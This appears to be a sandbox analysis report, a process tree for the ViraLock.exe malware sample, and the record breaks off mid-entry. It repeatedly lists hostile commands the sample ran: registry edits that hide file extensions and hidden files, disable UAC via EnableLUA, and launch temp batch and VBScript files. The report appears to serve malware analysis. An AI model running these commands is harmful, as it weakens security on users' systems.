reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
104⤵
- Modifies visibility of file extensions in Explorer
PID:628

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
104⤵
PID:3200

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
104⤵
- UAC bypass
PID:3128

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
105⤵
PID:4996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cSMEcYQg.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
104⤵
PID:4928

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
105⤵
PID:3184

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
102⤵
PID:4896

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
102⤵
PID:4144

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
102⤵
- UAC bypass
PID:4116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yQQogkIw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
102⤵
PID:4808

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
103⤵
PID:4608

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
103⤵
PID:2184

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
100⤵
- Modifies visibility of file extensions in Explorer
PID:2520

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
100⤵
PID:1276

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
101⤵
PID:280

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
100⤵
- UAC bypass
PID:4492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yEskQQEI.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
100⤵
PID:2624

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
101⤵
PID:4564

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
98⤵
PID:4568

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
99⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1104

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
98⤵
- Modifies registry key
PID:4860

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
99⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3352

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
98⤵
- UAC bypass
PID:1460

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
99⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2340

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\byUMIgAU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
98⤵
PID:1312

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
99⤵
PID:4996

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
96⤵
- Modifies visibility of file extensions in Explorer
PID:4032

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
96⤵
PID:4680

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
96⤵
- UAC bypass
- Modifies registry key
PID:3472

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
97⤵
PID:1436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zOUEEoIY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
96⤵
PID:2460

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
97⤵
PID:2536

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
97⤵
PID:2980

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
94⤵
- Modifies visibility of file extensions in Explorer
PID:4040

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
94⤵
- Modifies registry key
PID:2360

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
94⤵
- UAC bypass
PID:3880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\teUEMwgw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
94⤵
PID:5068

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
95⤵
PID:4296

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
92⤵
- Modifies visibility of file extensions in Explorer
PID:4288

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
92⤵
- Modifies registry key
PID:4056

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
92⤵
- UAC bypass
PID:3404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wOcgokIs.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
92⤵
PID:4376

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
93⤵
PID:1684

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
90⤵
- Modifies visibility of file extensions in Explorer
PID:2368

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
90⤵
PID:4608

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
91⤵
PID:1640

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
90⤵
PID:4804

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
91⤵
PID:4324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GwMUMQQc.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
90⤵
PID:2468

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
91⤵
PID:4320

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
88⤵
- Modifies visibility of file extensions in Explorer
PID:720

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
88⤵
PID:1680

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
89⤵
PID:2156

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
88⤵
- UAC bypass
PID:4568

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QiYAsYAY.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
88⤵
PID:3200

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
89⤵
PID:628

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
86⤵
- Modifies visibility of file extensions in Explorer
PID:4056

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
86⤵
PID:2340

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
86⤵
PID:1276

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jEIgAwQw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
86⤵
PID:1656

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
87⤵
PID:116

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
84⤵
PID:4536

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
84⤵
PID:4608

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
84⤵
- UAC bypass
PID:1688

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LgQQgkEo.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
84⤵
PID:1848

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
85⤵
PID:400

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
82⤵
- Modifies visibility of file extensions in Explorer
PID:2024

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
82⤵
PID:4860

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
82⤵
- Modifies registry key
PID:3236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lYgAMYMU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
82⤵
PID:3940

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
83⤵
PID:2156

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
80⤵
- Modifies visibility of file extensions in Explorer
PID:4952

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
80⤵
PID:4832

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
81⤵
PID:716

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
80⤵
PID:5100

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kAwMcwQU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
80⤵
PID:2536

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
81⤵
PID:3128

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
78⤵
- Modifies visibility of file extensions in Explorer
PID:2488

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
79⤵
PID:3548

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
78⤵
PID:1148

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
78⤵
PID:1004

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IuAMQEcQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
78⤵
PID:4324

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
79⤵
PID:3788

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
79⤵
PID:1688

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
76⤵
- Modifies visibility of file extensions in Explorer
PID:1080

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
77⤵
PID:644

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
76⤵
PID:4144

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
76⤵
- UAC bypass
PID:4288

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IMAksMIw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
76⤵
PID:4568

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
77⤵
PID:3684

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
74⤵
- Modifies visibility of file extensions in Explorer
PID:5108

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
74⤵
PID:4536

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
74⤵
PID:992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zksYsYEQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
74⤵
PID:2724

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
75⤵
PID:4612

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
72⤵
PID:4632

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
72⤵
PID:2612

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
72⤵
- UAC bypass
PID:2488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jsksUMQU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
72⤵
PID:4380

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
73⤵
PID:3548

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
70⤵
- Modifies visibility of file extensions in Explorer
PID:1128

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
70⤵
PID:4804

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
71⤵
PID:1644

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
70⤵
- UAC bypass
PID:880

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PEYoEoAI.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
70⤵
PID:3100

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
71⤵
PID:300

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
71⤵
PID:644

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
68⤵
- Modifies visibility of file extensions in Explorer
PID:5068

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
68⤵
PID:3436

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
68⤵
- UAC bypass
PID:4264

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QykYEYYI.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
68⤵
PID:4936

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
69⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3732

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
69⤵
PID:292

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
66⤵
- Modifies visibility of file extensions in Explorer
PID:3140

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
66⤵
PID:3844

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
66⤵
- UAC bypass
PID:1484

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
67⤵
PID:1460

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ukMcogYg.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
66⤵
PID:5052

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
67⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3788

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
67⤵
PID:3408

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
64⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:208

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
64⤵
PID:4728

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
64⤵
PID:3832

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BsMIMEsI.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
64⤵
PID:4068

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
65⤵
PID:2860

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
62⤵
- Modifies visibility of file extensions in Explorer
PID:1460

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
62⤵
- Modifies registry key
PID:3200

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
62⤵
PID:3992

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LAcIcYMQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
62⤵
PID:4560

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
63⤵
PID:3236

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
60⤵
- Modifies visibility of file extensions in Explorer
PID:224

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
60⤵
PID:3204

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
60⤵
PID:4472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NeIMMEQk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
60⤵
PID:1644

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
61⤵
PID:1276

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
61⤵
PID:628

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
58⤵
- Modifies visibility of file extensions in Explorer
PID:1720

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
58⤵
PID:1684

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
58⤵
PID:116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SMAkcwYc.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
58⤵
PID:4928

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
59⤵
PID:1436

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
56⤵
PID:1688

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
56⤵
PID:4776

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
56⤵
PID:3336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oeAUsccg.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
56⤵
PID:4976

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
57⤵
PID:4860

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
54⤵
- Modifies visibility of file extensions in Explorer
- Modifies registry key
PID:3108

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
54⤵
PID:3300

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
55⤵
PID:4492

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
54⤵
- UAC bypass
- Modifies registry key
PID:2032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ESEowAsk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
54⤵
PID:3788

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
55⤵
PID:720

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
52⤵
- Modifies visibility of file extensions in Explorer
PID:3436

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
52⤵
PID:4028

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
52⤵
- UAC bypass
- Modifies registry key
PID:2980

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LwEMcgMs.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
52⤵
PID:300

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
53⤵
PID:4144

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
50⤵
- Modifies visibility of file extensions in Explorer
PID:4116

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
50⤵
PID:3844

C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
50⤵
- Modifies registry key
PID:2016

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lIkYowwI.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
50⤵
PID:3472

C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
51⤵
PID:4988

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
48⤵
- Modifies visibility of file extensions in Explorer
PID:3016

C:\Windows\SysWOW64\reg.exe
